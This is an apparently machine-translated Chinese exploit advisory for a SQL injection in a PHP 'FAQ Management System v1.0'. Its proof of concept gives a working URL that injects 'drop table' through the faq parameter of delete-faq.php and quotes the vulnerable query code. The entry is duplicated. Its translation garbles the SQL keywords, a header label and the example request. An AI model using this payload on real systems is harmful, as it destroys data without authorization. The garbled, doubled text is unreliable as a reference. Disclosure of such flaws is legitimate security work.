#利用标题:常见问题管理系统v1.0-“常见问题解答” SQL注入
#Google Dork: N/A
#Application: FAQ管理系统
#日期: 25.02.2024
#BUGS: SQL注入
#利用作者: Sospiro
#供应商homepage3360 https://www.sourcecodester.com/
#软件链接: https://ww.sourcecodester.com/php/1...-using-php-and-php-and-mysql-source-code.html
#版本: 1.0
#测试在: Windows 10 64位Wampserver
#CVE : N/A
##漏洞描述:
提供的代码容易受到SQL注入的影响。该漏洞源于在SQL查询中直接使用用户输入($ _GET ['FAQ'])而没有适当验证或消毒。攻击者可以操纵“ FAQ”参数注入恶意SQL代码,从而导致意外且潜在的和谐的数据库操作。
##概念证明(POC):
攻击者可以操纵“ FAQ”参数以执行SQL注入。示例:
1。原始请求:
2.Malicious请求(SQL注入):
http://example.com/endpoint/delete-faq.php?faq=123'; drop table tbl_faq; - -
这将导致查询:
从tbl_faq删除tbl_faq_id='123'; drop table tbl_faq; - -
这可能导致数据删除甚至整个表。
POC foto: ##弱势代码部分:
==========================================================================
端点/delete-faq.php
$ FAQ=$ _GET ['FAQ'];
//.
$ query='从tbl_faq delete tbl_faq_id='$ faq'';
#Google Dork: N/A
#Application: FAQ管理系统
#日期: 25.02.2024
#BUGS: SQL注入
#利用作者: Sospiro
#供应商homepage3360 https://www.sourcecodester.com/
#软件链接: https://ww.sourcecodester.com/php/1...-using-php-and-php-and-mysql-source-code.html
#版本: 1.0
#测试在: Windows 10 64位Wampserver
#CVE : N/A
##漏洞描述:
提供的代码容易受到SQL注入的影响。该漏洞源于在SQL查询中直接使用用户输入($ _GET ['FAQ'])而没有适当验证或消毒。攻击者可以操纵“ FAQ”参数注入恶意SQL代码,从而导致意外且潜在的和谐的数据库操作。
##概念证明(POC):
攻击者可以操纵“ FAQ”参数以执行SQL注入。示例:
1。原始请求:
正在加载...
example.com
http://example.com/endpoint/delete-faq.php?faq=123'; drop table tbl_faq; - -
这将导致查询:
从tbl_faq删除tbl_faq_id='123'; drop table tbl_faq; - -
这可能导致数据删除甚至整个表。
POC foto: ##弱势代码部分:
==========================================================================
端点/delete-faq.php
$ FAQ=$ _GET ['FAQ'];
//.
$ query='从tbl_faq delete tbl_faq_id='$ faq'';